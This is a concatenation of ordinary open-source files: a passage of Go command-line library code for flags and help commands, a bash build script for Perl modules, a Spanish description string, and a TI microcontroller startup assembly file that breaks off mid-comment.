	c.Flags().VisitAll(func(f *flag.Flag) {
		annotation, ok := f.Annotations[BashCompOneRequiredFlag]
		if !ok {
			return
		}
		if annotation[0] == "true" && !f.Changed {
			missing = append(missing, f.Name)
		}
	})

	if len(missing) == 0 {
		return nil
	}
	return fmt.Errorf(`required flag(s) "%s" not set`, strings.Join(missing, `", "`))
}
// InitDefaultHelpFlag adds default help flag to c.
// It is called automatically by executing the c or by calling help and usage.
// If c already has help flag, it will do nothing.
func (c *Command) InitDefaultHelpFlag() {
	c.mergePersistentFlags()
	if c.Flags().Lookup("help") != nil {
		return
	}
	target := c.Name()
	if target == "" {
		target = "this command"
	}
	c.Flags().BoolP("help", "h", false, "help for "+target)
}
// InitDefaultVersionFlag adds default version flag to c.
// It is called automatically by executing the c.
// If c already has a version flag, it will do nothing.
// If c.Version is empty, it will do nothing.
func (c *Command) InitDefaultVersionFlag() {
	if c.Version == "" {
		return
	}
	c.mergePersistentFlags()
	if c.Flags().Lookup("version") != nil {
		return
	}
	target := c.Name()
	if target == "" {
		target = "this command"
	}
	usage := "version for " + target
	// Only claim the -v shorthand if it is still free.
	if c.Flags().ShorthandLookup("v") == nil {
		c.Flags().BoolP("version", "v", false, usage)
	} else {
		c.Flags().Bool("version", false, usage)
	}
}
// InitDefaultHelpCmd adds default help command to c.
// It is called automatically by executing the c or by calling help and usage.
// If c already has help command or c has no subcommands, it will do nothing.
func (c *Command) InitDefaultHelpCmd() {
	if !c.HasSubCommands() {
		return
	}

	// Lazily build the help command the first time; it resolves its argument
	// against the root of the command tree.
	if c.helpCommand == nil {
		c.helpCommand = &Command{
			Use:   "help [command]",
			Short: "Help about any command",
			Long: `Help provides help for any command in the application.
Simply type ` + c.Name() + ` help [path to command] for full details.`,

			Run: func(c *Command, args []string) {
				cmd, _, e := c.Root().Find(args)
				if cmd == nil || e != nil {
					c.Printf("Unknown help topic %#q\n", args)
					c.Root().Usage()
				} else {
					cmd.InitDefaultHelpFlag() // make possible 'help' flag to be shown
					cmd.Help()
				}
			},
		}
	}
	// Re-register so the help command is attached exactly once.
	c.RemoveCommand(c.helpCommand)
	c.AddCommand(c.helpCommand)
}
// ResetCommands deletes the parent, all subcommands, the help command, and the
// cached parent persistent flags from c.
func (c *Command) ResetCommands() {
	c.parent = nil
	c.commands = nil
	c.helpCommand = nil
	c.parentsPflags = nil
}
// commandSorterByName implements sort.Interface, ordering commands
// alphabetically by their Name().
type commandSorterByName []*Command

func (c commandSorterByName) Len() int           { return len(c) }
func (c commandSorterByName) Swap(i, j int)      { c[i], c[j] = c[j], c[i] }
func (c commandSorterByName) Less(i, j int) bool { return c[i].Name() < c[j].Name() }
// Commands returns a sorted slice of child commands.
// Sorting happens at most once per mutation (AddCommand resets the flag) and
// can be disabled globally via EnableCommandSorting.
func (c *Command) Commands() []*Command {
	// do not sort commands if it already sorted or sorting was disabled
	if EnableCommandSorting && !c.commandsAreSorted {
		sort.Sort(commandSorterByName(c.commands))
		c.commandsAreSorted = true
	}
	return c.commands
}
// AddCommand adds one or more commands to this parent command.
// It panics if asked to add a command to itself.
func (c *Command) AddCommand(cmds ...*Command) {
	for _, cmd := range cmds {
		if cmd == c {
			panic("Command can't be a child of itself")
		}
		cmd.parent = c
		// Keep the cached maximum Use/CommandPath/Name lengths up to date.
		if l := len(cmd.Use); l > c.commandsMaxUseLen {
			c.commandsMaxUseLen = l
		}
		if l := len(cmd.CommandPath()); l > c.commandsMaxCommandPathLen {
			c.commandsMaxCommandPathLen = l
		}
		if l := len(cmd.Name()); l > c.commandsMaxNameLen {
			c.commandsMaxNameLen = l
		}
		// If global normalization function exists, update all children
		if c.globNormFunc != nil {
			cmd.SetGlobalNormalizationFunc(c.globNormFunc)
		}
		c.commands = append(c.commands, cmd)
		c.commandsAreSorted = false
	}
}
// RemoveCommand removes one or more commands from a parent command and
// recomputes the cached maximum Use/CommandPath/Name lengths.
func (c *Command) RemoveCommand(cmds ...*Command) {
	remaining := []*Command{}
	for _, command := range c.commands {
		removed := false
		for _, cmd := range cmds {
			if command == cmd {
				// Detach the removed child from its parent.
				command.parent = nil
				removed = true
				break
			}
		}
		if !removed {
			remaining = append(remaining, command)
		}
	}
	c.commands = remaining

	// recompute all lengths
	c.commandsMaxUseLen = 0
	c.commandsMaxCommandPathLen = 0
	c.commandsMaxNameLen = 0
	for _, command := range c.commands {
		if l := len(command.Use); l > c.commandsMaxUseLen {
			c.commandsMaxUseLen = l
		}
		if l := len(command.CommandPath()); l > c.commandsMaxCommandPathLen {
			c.commandsMaxCommandPathLen = l
		}
		if l := len(command.Name()); l > c.commandsMaxNameLen {
			c.commandsMaxNameLen = l
		}
	}
}
// Print is a convenience method to Print to the defined output, fallback to Stderr if not set.
// Println and Printf delegate here.
func (c *Command) Print(i ...interface{}) {
	fmt.Fprint(c.OutOrStderr(), i...)
}
// Println is a convenience method to Println to the defined output, fallback to Stderr if not set.
func (c *Command) Println(i ...interface{}) {
	c.Print(fmt.Sprintln(i...))
}
// Printf is a convenience method to Printf to the defined output, fallback to Stderr if not set.
func (c *Command) Printf(format string, i ...interface{}) {
	c.Print(fmt.Sprintf(format, i...))
}
// PrintErr is a convenience method to Print to the defined Err output, fallback to Stderr if not set.
func (c *Command) PrintErr(i ...interface{}) {
	fmt.Fprint(c.ErrOrStderr(), i...)
}
// PrintErrln is a convenience method to Println to the defined Err output, fallback to Stderr if not set.
func (c *Command) PrintErrln(i ...interface{}) {
	// Route through PrintErr so the text actually reaches the error stream.
	// The previous implementation called c.Print, which wrote to the regular
	// output and contradicted the documented contract.
	c.PrintErr(fmt.Sprintln(i...))
}
// PrintErrf is a convenience method to Printf to the defined Err output, fallback to Stderr if not set.
func (c *Command) PrintErrf(format string, i ...interface{}) {
	// Route through PrintErr so the text actually reaches the error stream.
	// The previous implementation called c.Print, which wrote to the regular
	// output and contradicted the documented contract.
	c.PrintErr(fmt.Sprintf(format, i...))
}
// CommandPath returns the full path to this command: the space-separated
// names of all ancestors from the root down to this command.
func (c *Command) CommandPath() string {
	path := c.Name()
	for p := c.Parent(); p != nil; p = p.Parent() {
		path = p.Name() + " " + path
	}
	return path
}
// UseLine puts out the full usage for a given command (including parents).
func (c *Command) UseLine() string {
	useline := c.Use
	if c.HasParent() {
		useline = c.parent.CommandPath() + " " + c.Use
	}
	if c.DisableFlagsInUseLine {
		return useline
	}
	// Append the [flags] placeholder unless the Use string already carries it.
	if c.HasAvailableFlags() && !strings.Contains(useline, "[flags]") {
		useline += " [flags]"
	}
	return useline
}
// DebugFlags used to determine which flags have been assigned to which commands
// and which persist.
// Output markers: [L] local flag, [P] persistent flag, [LP] local flag that
// shadows a persistent one.
func (c *Command) DebugFlags() {
	c.Println("DebugFlags called on", c.Name())
	var debugflags func(*Command)

	// debugflags prints the flags of x and then recurses into its children.
	debugflags = func(x *Command) {
		if x.HasFlags() || x.HasPersistentFlags() {
			c.Println(x.Name())
		}
		if x.HasFlags() {
			x.flags.VisitAll(func(f *flag.Flag) {
				if x.HasPersistentFlags() && x.persistentFlag(f.Name) != nil {
					c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [LP]")
				} else {
					c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [L]")
				}
			})
		}
		if x.HasPersistentFlags() {
			x.pflags.VisitAll(func(f *flag.Flag) {
				if x.HasFlags() {
					// Skip persistent flags already printed as [LP] above.
					if x.flags.Lookup(f.Name) == nil {
						c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [P]")
					}
				} else {
					c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [P]")
				}
			})
		}
		c.Println(x.flagErrorBuf)
		if x.HasSubCommands() {
			for _, y := range x.commands {
				debugflags(y)
			}
		}
	}

	debugflags(c)
}
// Name returns the command's name: the first word in the use line.
func (c *Command) Name() string {
	if i := strings.Index(c.Use, " "); i >= 0 {
		return c.Use[:i]
	}
	return c.Use
}
// HasAlias determines if a given string is an alias of the command.
// Comparison is case-sensitive and exact.
func (c *Command) HasAlias(s string) bool {
	for _, alias := range c.Aliases {
		if alias == s {
			return true
		}
	}
	return false
}
// CalledAs returns the command name or alias that was used to invoke
// this command or an empty string if the command has not been called.
func (c *Command) CalledAs() string {
	if !c.commandCalledAs.called {
		return ""
	}
	return c.commandCalledAs.name
}
// hasNameOrAliasPrefix returns true if the Name or any of aliases start
// with prefix.
// Side effect: on a match it records the matched name/alias in
// c.commandCalledAs.name, which CalledAs later reports.
func (c *Command) hasNameOrAliasPrefix(prefix string) bool {
	if strings.HasPrefix(c.Name(), prefix) {
		c.commandCalledAs.name = c.Name()
		return true
	}
	for _, alias := range c.Aliases {
		if strings.HasPrefix(alias, prefix) {
			c.commandCalledAs.name = alias
			return true
		}
	}
	return false
}
// NameAndAliases returns the command name followed by all aliases,
// joined as a single comma-separated string.
func (c *Command) NameAndAliases() string {
	return strings.Join(append([]string{c.Name()}, c.Aliases...), ", ")
}
// HasExample determines if the command has a non-empty Example string.
func (c *Command) HasExample() bool {
	return c.Example != ""
}
// Runnable determines if the command is itself runnable, i.e. it has either
// a Run or RunE function set.
func (c *Command) Runnable() bool {
	return c.Run != nil || c.RunE != nil
}
// HasSubCommands determines if the command has children commands.
func (c *Command) HasSubCommands() bool {
	return len(c.commands) > 0
}
// IsAvailableCommand determines if a command is available as a non-help command
// (this includes all non deprecated/hidden commands).
func (c *Command) IsAvailableCommand() bool {
	if len(c.Deprecated) != 0 || c.Hidden {
		return false
	}
	// The parent's designated help command is never listed as available.
	if c.HasParent() && c.Parent().helpCommand == c {
		return false
	}
	return c.Runnable() || c.HasAvailableSubCommands()
}
// IsAdditionalHelpTopicCommand determines if a command is an additional
// help topic command; additional help topic command is determined by the
// fact that it is NOT runnable/hidden/deprecated, and has no sub commands that
// are runnable/hidden/deprecated.
// Concrete example: https://github.com/spf13/cobra/issues/393#issuecomment-282741924.
func (c *Command) IsAdditionalHelpTopicCommand() bool {
	// if a command is runnable, deprecated, or hidden it is not a 'help' command
	if c.Runnable() || len(c.Deprecated) != 0 || c.Hidden {
		return false
	}

	// if any non-help sub commands are found, the command is not a 'help' command
	// (the check recurses through the whole subtree)
	for _, sub := range c.commands {
		if !sub.IsAdditionalHelpTopicCommand() {
			return false
		}
	}

	// the command either has no sub commands, or no non-help sub commands
	return true
}
// HasHelpSubCommands determines if a command has any available 'help' sub commands
// that need to be shown in the usage/help default template under 'additional help
// topics'.
func (c *Command) HasHelpSubCommands() bool {
	// return true on the first found available 'help' sub command
	for _, sub := range c.commands {
		if sub.IsAdditionalHelpTopicCommand() {
			return true
		}
	}

	// the command either has no sub commands, or no available 'help' sub commands
	return false
}
// HasAvailableSubCommands determines if a command has available sub commands that
// need to be shown in the usage/help default template under 'available commands'.
func (c *Command) HasAvailableSubCommands() bool {
	// return true on the first found available (non deprecated/help/hidden)
	// sub command
	for _, sub := range c.commands {
		if sub.IsAvailableCommand() {
			return true
		}
	}

	// the command either has no sub commands, or no available (non deprecated/help/hidden)
	// sub commands
	return false
}
// HasParent determines if the command is a child command (i.e. it has been
// added to another command via AddCommand).
func (c *Command) HasParent() bool {
	return c.parent != nil
}
// GlobalNormalizationFunc returns the global normalization function or nil if it doesn't exist.
func (c *Command) GlobalNormalizationFunc() func(f *flag.FlagSet, name string) flag.NormalizedName {
	return c.globNormFunc
}
// Flags returns the complete FlagSet that applies
// to this command (local and persistent declared here and by all parents).
// The flag set (and its shared error buffer) is created lazily on first use.
func (c *Command) Flags() *flag.FlagSet {
	if c.flags == nil {
		c.flags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
		if c.flagErrorBuf == nil {
			c.flagErrorBuf = new(bytes.Buffer)
		}
		// Flag-parsing errors are collected in flagErrorBuf rather than stderr.
		c.flags.SetOutput(c.flagErrorBuf)
	}

	return c.flags
}
// LocalNonPersistentFlags are flags specific to this command which will NOT persist to subcommands.
func (c *Command) LocalNonPersistentFlags() *flag.FlagSet {
	persistent := c.PersistentFlags()
	result := flag.NewFlagSet(c.Name(), flag.ContinueOnError)
	// Copy every local flag that is not also declared persistent.
	c.LocalFlags().VisitAll(func(f *flag.Flag) {
		if persistent.Lookup(f.Name) == nil {
			result.AddFlag(f)
		}
	})
	return result
}
// LocalFlags returns the local FlagSet specifically set in the current command.
// The returned set is rebuilt on each call from Flags() and PersistentFlags(),
// excluding anything inherited from parents.
func (c *Command) LocalFlags() *flag.FlagSet {
	c.mergePersistentFlags()

	if c.lflags == nil {
		c.lflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
		if c.flagErrorBuf == nil {
			c.flagErrorBuf = new(bytes.Buffer)
		}
		c.lflags.SetOutput(c.flagErrorBuf)
	}
	c.lflags.SortFlags = c.Flags().SortFlags
	if c.globNormFunc != nil {
		c.lflags.SetNormalizeFunc(c.globNormFunc)
	}

	// A flag is local when it is in Flags()/PersistentFlags() but was not
	// inherited from a parent's persistent flags.
	addToLocal := func(f *flag.Flag) {
		if c.lflags.Lookup(f.Name) == nil && c.parentsPflags.Lookup(f.Name) == nil {
			c.lflags.AddFlag(f)
		}
	}
	c.Flags().VisitAll(addToLocal)
	c.PersistentFlags().VisitAll(addToLocal)
	return c.lflags
}
// InheritedFlags returns all flags which were inherited from parent commands:
// the parents' persistent flags minus anything redeclared locally.
func (c *Command) InheritedFlags() *flag.FlagSet {
	c.mergePersistentFlags()

	if c.iflags == nil {
		c.iflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
		if c.flagErrorBuf == nil {
			c.flagErrorBuf = new(bytes.Buffer)
		}
		c.iflags.SetOutput(c.flagErrorBuf)
	}

	local := c.LocalFlags()
	if c.globNormFunc != nil {
		c.iflags.SetNormalizeFunc(c.globNormFunc)
	}

	c.parentsPflags.VisitAll(func(f *flag.Flag) {
		// Local flags shadow inherited ones of the same name.
		if c.iflags.Lookup(f.Name) == nil && local.Lookup(f.Name) == nil {
			c.iflags.AddFlag(f)
		}
	})
	return c.iflags
}
// NonInheritedFlags returns all flags which were not inherited from parent
// commands. It is an alias for LocalFlags.
func (c *Command) NonInheritedFlags() *flag.FlagSet {
	return c.LocalFlags()
}
// PersistentFlags returns the persistent FlagSet specifically set in the current command.
// The flag set (and its shared error buffer) is created lazily on first use.
func (c *Command) PersistentFlags() *flag.FlagSet {
	if c.pflags == nil {
		c.pflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
		if c.flagErrorBuf == nil {
			c.flagErrorBuf = new(bytes.Buffer)
		}
		c.pflags.SetOutput(c.flagErrorBuf)
	}
	return c.pflags
}
// ResetFlags deletes all flags from command, recreating the local and
// persistent flag sets and clearing every cached derived set.
func (c *Command) ResetFlags() {
	c.flagErrorBuf = new(bytes.Buffer)
	c.flagErrorBuf.Reset()
	c.flags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
	c.flags.SetOutput(c.flagErrorBuf)
	c.pflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
	c.pflags.SetOutput(c.flagErrorBuf)

	// Derived sets are rebuilt lazily by their accessors.
	c.lflags = nil
	c.iflags = nil
	c.parentsPflags = nil
}
// HasFlags checks if the command contains any flags (local plus persistent from the entire structure),
// as reported by the merged Flags() set.
func (c *Command) HasFlags() bool {
	return c.Flags().HasFlags()
}
// HasPersistentFlags checks if the command contains persistent flags
// declared on this command itself.
func (c *Command) HasPersistentFlags() bool {
	return c.PersistentFlags().HasFlags()
}
// HasLocalFlags checks if the command has flags specifically declared locally
// (i.e. not inherited from a parent).
func (c *Command) HasLocalFlags() bool {
	return c.LocalFlags().HasFlags()
}
// HasInheritedFlags checks if the command has flags inherited from its parent command.
func (c *Command) HasInheritedFlags() bool {
	return c.InheritedFlags().HasFlags()
}
// HasAvailableFlags checks if the command contains any flags (local plus persistent from the entire
// structure) which are not hidden or deprecated.
func (c *Command) HasAvailableFlags() bool {
	return c.Flags().HasAvailableFlags()
}
// HasAvailablePersistentFlags checks if the command contains persistent flags which are not hidden or deprecated.
func (c *Command) HasAvailablePersistentFlags() bool {
	return c.PersistentFlags().HasAvailableFlags()
}
// HasAvailableLocalFlags checks if the command has flags specifically declared locally which are not hidden
// or deprecated.
func (c *Command) HasAvailableLocalFlags() bool {
	return c.LocalFlags().HasAvailableFlags()
}
// HasAvailableInheritedFlags checks if the command has flags inherited from its parent command which are
// not hidden or deprecated.
func (c *Command) HasAvailableInheritedFlags() bool {
	return c.InheritedFlags().HasAvailableFlags()
}
// Flag climbs up the command tree looking for matching flag:
// first the command's own merged flags, then persistent flags of the parents.
// Returns nil if no flag of that name exists anywhere on the path to the root.
func (c *Command) Flag(name string) (flag *flag.Flag) {
	flag = c.Flags().Lookup(name)

	if flag == nil {
		flag = c.persistentFlag(name)
	}

	return
}
// persistentFlag recursively finds a matching persistent flag, first in this
// command's own persistent flags and then in the cached parents' persistent
// flags (refreshed via updateParentsPflags).
func (c *Command) persistentFlag(name string) (flag *flag.Flag) {
	if c.HasPersistentFlags() {
		flag = c.PersistentFlags().Lookup(name)
	}

	if flag == nil {
		c.updateParentsPflags()
		flag = c.parentsPflags.Lookup(name)
	}
	return
}
// ParseFlags parses persistent flag tree and local flags.
// It is a no-op when DisableFlagParsing is set. Any warnings accumulated in
// the flag error buffer during a successful parse (e.g. deprecation notices)
// are printed to the command's output.
func (c *Command) ParseFlags(args []string) error {
	if c.DisableFlagParsing {
		return nil
	}

	if c.flagErrorBuf == nil {
		c.flagErrorBuf = new(bytes.Buffer)
	}
	// Remember how much was already buffered so only new output is printed.
	beforeErrorBufLen := c.flagErrorBuf.Len()
	c.mergePersistentFlags()

	// do it here after merging all flags and just before parse
	c.Flags().ParseErrorsWhitelist = flag.ParseErrorsWhitelist(c.FParseErrWhitelist)

	err := c.Flags().Parse(args)
	// Print warnings if they occurred (e.g. deprecated flag messages).
	if c.flagErrorBuf.Len()-beforeErrorBufLen > 0 && err == nil {
		c.Print(c.flagErrorBuf.String())
	}

	return err
}
// Parent returns a command's parent command, or nil for a root command.
func (c *Command) Parent() *Command {
	return c.parent
}
// mergePersistentFlags merges c.PersistentFlags() to c.Flags()
// and adds missing persistent flags of all parents, so that Flags()
// represents the complete set usable on this command.
func (c *Command) mergePersistentFlags() {
	c.updateParentsPflags()
	c.Flags().AddFlagSet(c.PersistentFlags())
	c.Flags().AddFlagSet(c.parentsPflags)
}
// updateParentsPflags updates c.parentsPflags by adding
// new persistent flags of all parents.
// If c.parentsPflags == nil, it makes new.
// The root's persistent flags also absorb flag.CommandLine.
func (c *Command) updateParentsPflags() {
	if c.parentsPflags == nil {
		c.parentsPflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
		// NOTE(review): c.flagErrorBuf may still be nil here if no flag set
		// was initialized yet — confirm the intended output destination.
		c.parentsPflags.SetOutput(c.flagErrorBuf)
		// Preserve declaration order so inherited flags keep their ordering.
		c.parentsPflags.SortFlags = false
	}

	if c.globNormFunc != nil {
		c.parentsPflags.SetNormalizeFunc(c.globNormFunc)
	}

	c.Root().PersistentFlags().AddFlagSet(flag.CommandLine)

	c.VisitParents(func(parent *Command) {
		c.parentsPflags.AddFlagSet(parent.PersistentFlags())
	})
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Build, test, and install a Perl distribution into the "site" directories.
# Fail fast: without errexit a failing perl/make/test step was silently
# ignored and the script still exited 0, reporting a broken build as success.
set -euo pipefail

# If it has Build.PL use that, otherwise use Makefile.PL
if [ -f Build.PL ]; then
    perl Build.PL
    ./Build
    ./Build test
    # Make sure this goes in site
    ./Build install --installdirs site
elif [ -f Makefile.PL ]; then
    # Make sure this goes in site
    perl Makefile.PL INSTALLDIRS=site
    make
    make test
    make install
else
    echo 'Unable to find Build.PL or Makefile.PL. You need to modify build.sh.'
    exit 1
fi
| {
"pile_set_name": "Github"
} |
desc_es=Generador de Informes de Análisis de Squid
| {
"pile_set_name": "Github"
} |
; <<< Use Configuration Wizard in Context Menu >>>
;******************************************************************************
;
; startup_rvmdk.S - Startup code for use with Keil's uVision.
;
; Copyright (c) 2013-2014 Texas Instruments Incorporated. All rights reserved.
; Software License Agreement
;
; Texas Instruments (TI) is supplying this software for use solely and
; exclusively on TI's microcontroller products. The software is owned by
; TI and/or its suppliers, and is protected under applicable copyright
; laws. You may not combine this software with "viral" open-source
; software in order to form a larger program.
;
; THIS SOFTWARE IS PROVIDED "AS IS" AND WITH ALL FAULTS.
; NO WARRANTIES, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING, BUT
; NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
; A PARTICULAR PURPOSE APPLY TO THIS SOFTWARE. TI SHALL NOT, UNDER ANY
; CIRCUMSTANCES, BE LIABLE FOR SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
; DAMAGES, FOR ANY REASON WHATSOEVER.
;
; This is part of revision 2.1.0.12573 of the EK-TM4C1294XL Firmware Package.
;
;******************************************************************************
;******************************************************************************
;
; <o> Stack Size (in Bytes) <0x0-0xFFFFFFFF:8>
;
;******************************************************************************
Stack EQU 0x00000200
;******************************************************************************
;
; <o> Heap Size (in Bytes) <0x0-0xFFFFFFFF:8>
;
;******************************************************************************
Heap EQU 0x00000000
;******************************************************************************
;
; Allocate space for the stack.
;
;******************************************************************************
AREA STACK, NOINIT, READWRITE, ALIGN=3
StackMem
SPACE Stack
__initial_sp
;******************************************************************************
;
; Allocate space for the heap.
;
;******************************************************************************
AREA HEAP, NOINIT, READWRITE, ALIGN=3
__heap_base
HeapMem
SPACE Heap
__heap_limit
;******************************************************************************
;
; Indicate that the code in this file preserves 8-byte alignment of the stack.
;
;******************************************************************************
PRESERVE8
;******************************************************************************
;
; Place code into the reset code section.
;
;******************************************************************************
AREA RESET, CODE, READONLY
THUMB
;******************************************************************************
;
; The vector table.
;
;******************************************************************************
EXPORT __Vectors
__Vectors
DCD StackMem + Stack ; Top of Stack
DCD Reset_Handler ; Reset Handler
DCD NmiSR ; NMI Handler
DCD FaultISR ; Hard Fault Handler
DCD IntDefaultHandler ; The MPU fault handler
DCD IntDefaultHandler ; The bus fault handler
DCD IntDefaultHandler ; The usage fault handler
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD IntDefaultHandler ; SVCall handler
DCD IntDefaultHandler ; Debug monitor handler
DCD 0 ; Reserved
DCD IntDefaultHandler ; The PendSV handler
DCD IntDefaultHandler ; The SysTick handler
DCD IntDefaultHandler ; GPIO Port A
DCD IntDefaultHandler ; GPIO Port B
DCD IntDefaultHandler ; GPIO Port C
DCD IntDefaultHandler ; GPIO Port D
DCD IntDefaultHandler ; GPIO Port E
DCD IntDefaultHandler ; UART0 Rx and Tx
DCD IntDefaultHandler ; UART1 Rx and Tx
DCD IntDefaultHandler ; SSI0 Rx and Tx
DCD IntDefaultHandler ; I2C0 Master and Slave
DCD IntDefaultHandler ; PWM Fault
DCD IntDefaultHandler ; PWM Generator 0
DCD IntDefaultHandler ; PWM Generator 1
DCD IntDefaultHandler ; PWM Generator 2
DCD IntDefaultHandler ; Quadrature Encoder 0
DCD IntDefaultHandler ; ADC Sequence 0
DCD IntDefaultHandler ; ADC Sequence 1
DCD IntDefaultHandler ; ADC Sequence 2
DCD IntDefaultHandler ; ADC Sequence 3
DCD IntDefaultHandler ; Watchdog timer
DCD IntDefaultHandler ; Timer 0 subtimer A
DCD IntDefaultHandler ; Timer 0 subtimer B
DCD IntDefaultHandler ; Timer 1 subtimer A
DCD IntDefaultHandler ; Timer 1 subtimer B
DCD IntDefaultHandler ; Timer 2 subtimer A
DCD IntDefaultHandler ; Timer 2 subtimer B
DCD IntDefaultHandler ; Analog Comparator 0
DCD IntDefaultHandler ; Analog Comparator 1
DCD IntDefaultHandler ; Analog Comparator 2
DCD IntDefaultHandler ; System Control (PLL, OSC, BO)
DCD IntDefaultHandler ; FLASH Control
DCD IntDefaultHandler ; GPIO Port F
DCD IntDefaultHandler ; GPIO Port G
DCD IntDefaultHandler ; GPIO Port H
DCD IntDefaultHandler ; UART2 Rx and Tx
DCD IntDefaultHandler ; SSI1 Rx and Tx
DCD IntDefaultHandler ; Timer 3 subtimer A
DCD IntDefaultHandler ; Timer 3 subtimer B
DCD IntDefaultHandler ; I2C1 Master and Slave
DCD IntDefaultHandler ; CAN0
DCD IntDefaultHandler ; CAN1
DCD IntDefaultHandler ; Ethernet
DCD IntDefaultHandler ; Hibernate
DCD IntDefaultHandler ; USB0
DCD IntDefaultHandler ; PWM Generator 3
DCD IntDefaultHandler ; uDMA Software Transfer
DCD IntDefaultHandler ; uDMA Error
DCD IntDefaultHandler ; ADC1 Sequence 0
DCD IntDefaultHandler ; ADC1 Sequence 1
DCD IntDefaultHandler ; ADC1 Sequence 2
DCD IntDefaultHandler ; ADC1 Sequence 3
DCD IntDefaultHandler ; External Bus Interface 0
DCD IntDefaultHandler ; GPIO Port J
DCD IntDefaultHandler ; GPIO Port K
DCD IntDefaultHandler ; GPIO Port L
DCD IntDefaultHandler ; SSI2 Rx and Tx
DCD IntDefaultHandler ; SSI3 Rx and Tx
DCD IntDefaultHandler ; UART3 Rx and Tx
DCD IntDefaultHandler ; UART4 Rx and Tx
DCD IntDefaultHandler ; UART5 Rx and Tx
DCD IntDefaultHandler ; UART6 Rx and Tx
DCD IntDefaultHandler ; UART7 Rx and Tx
DCD IntDefaultHandler ; I2C2 Master and Slave
DCD IntDefaultHandler ; I2C3 Master and Slave
DCD IntDefaultHandler ; Timer 4 subtimer A
DCD IntDefaultHandler ; Timer 4 subtimer B
DCD IntDefaultHandler ; Timer 5 subtimer A
DCD IntDefaultHandler ; Timer 5 subtimer B
DCD IntDefaultHandler ; FPU
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD IntDefaultHandler ; I2C4 Master and Slave
DCD IntDefaultHandler ; I2C5 Master and Slave
DCD IntDefaultHandler ; GPIO Port M
DCD IntDefaultHandler ; GPIO Port N
DCD 0 ; Reserved
DCD IntDefaultHandler ; Tamper
DCD IntDefaultHandler ; GPIO Port P (Summary or P0)
DCD IntDefaultHandler ; GPIO Port P1
DCD IntDefaultHandler ; GPIO Port P2
DCD IntDefaultHandler ; GPIO Port P3
DCD IntDefaultHandler ; GPIO Port P4
DCD IntDefaultHandler ; GPIO Port P5
DCD IntDefaultHandler ; GPIO Port P6
DCD IntDefaultHandler ; GPIO Port P7
DCD IntDefaultHandler ; GPIO Port Q (Summary or Q0)
DCD IntDefaultHandler ; GPIO Port Q1
DCD IntDefaultHandler ; GPIO Port Q2
DCD IntDefaultHandler ; GPIO Port Q3
DCD IntDefaultHandler ; GPIO Port Q4
DCD IntDefaultHandler ; GPIO Port Q5
DCD IntDefaultHandler ; GPIO Port Q6
DCD IntDefaultHandler ; GPIO Port Q7
DCD IntDefaultHandler ; GPIO Port R
DCD IntDefaultHandler ; GPIO Port S
DCD IntDefaultHandler ; SHA/MD5 0
DCD IntDefaultHandler ; AES 0
DCD IntDefaultHandler ; DES3DES 0
DCD IntDefaultHandler ; LCD Controller 0
DCD IntDefaultHandler ; Timer 6 subtimer A
DCD IntDefaultHandler ; Timer 6 subtimer B
DCD IntDefaultHandler ; Timer 7 subtimer A
DCD IntDefaultHandler ; Timer 7 subtimer B
DCD IntDefaultHandler ; I2C6 Master and Slave
DCD IntDefaultHandler ; I2C7 Master and Slave
DCD IntDefaultHandler ; HIM Scan Matrix Keyboard 0
DCD IntDefaultHandler ; One Wire 0
DCD IntDefaultHandler ; HIM PS/2 0
DCD IntDefaultHandler ; HIM LED Sequencer 0
DCD IntDefaultHandler ; HIM Consumer IR 0
DCD IntDefaultHandler ; I2C8 Master and Slave
DCD IntDefaultHandler ; I2C9 Master and Slave
DCD IntDefaultHandler ; GPIO Port T
;******************************************************************************
;
; This is the code that gets called when the processor first starts execution
; following a reset event.
;
;******************************************************************************
        EXPORT  Reset_Handler
Reset_Handler
        ;
        ; Enable the floating-point unit.  This must be done here to handle the
        ; case where main() uses floating-point and the function prologue saves
        ; floating-point registers (which will fault if floating-point is not
        ; enabled).  Any configuration of the floating-point unit using
        ; DriverLib APIs must be done here prior to the floating-point unit
        ; being enabled.
        ;
        ; Note that this does not use DriverLib since it might not be included
        ; in this project.
        ;
        ; Build the CPACR address (0xE000ED88) and set the CP10/CP11
        ; coprocessor access bits via read-modify-write.
        MOVW    R0, #0xED88
        MOVT    R0, #0xE000
        LDR     R1, [R0]
        ORR     R1, #0x00F00000
        STR     R1, [R0]
        ;
        ; Call the C library entry point that handles startup.  This will copy
        ; the .data section initializers from flash to SRAM and zero fill the
        ; .bss section.
        ;
        IMPORT  __main
        B       __main
;******************************************************************************
;
; This is the code that gets called when the processor receives a NMI.  This
; simply enters an infinite loop, preserving the system state for examination
; by a debugger.
;
;******************************************************************************
NmiSR
        B       NmiSR               ; spin forever so a debugger can inspect state
;******************************************************************************
;
; This is the code that gets called when the processor receives a fault
; interrupt.  This simply enters an infinite loop, preserving the system state
; for examination by a debugger.
;
;******************************************************************************
FaultISR
        B       FaultISR            ; spin forever so a debugger can inspect state
;******************************************************************************
;
; This is the code that gets called when the processor receives an unexpected
; interrupt.  This simply enters an infinite loop, preserving the system state
; for examination by a debugger.
;
;******************************************************************************
IntDefaultHandler
        B       IntDefaultHandler   ; spin forever so a debugger can inspect state
;******************************************************************************
;
; Make sure the end of this section is aligned.
;
;******************************************************************************
ALIGN
;******************************************************************************
;
; Some code in the normal code section for initializing the heap and stack.
;
;******************************************************************************
AREA |.text|, CODE, READONLY
;******************************************************************************
;
; The function expected of the C library startup code for defining the stack
